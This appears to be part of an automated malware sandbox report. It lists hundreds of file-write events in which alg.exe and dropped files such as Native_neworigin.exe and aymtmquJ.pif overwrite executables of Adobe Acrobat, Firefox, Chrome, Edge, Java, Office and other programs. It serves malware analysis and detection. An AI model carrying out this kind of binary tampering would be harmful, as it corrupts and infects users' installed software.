Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\Public\Libraries\aymtmquJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\alg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
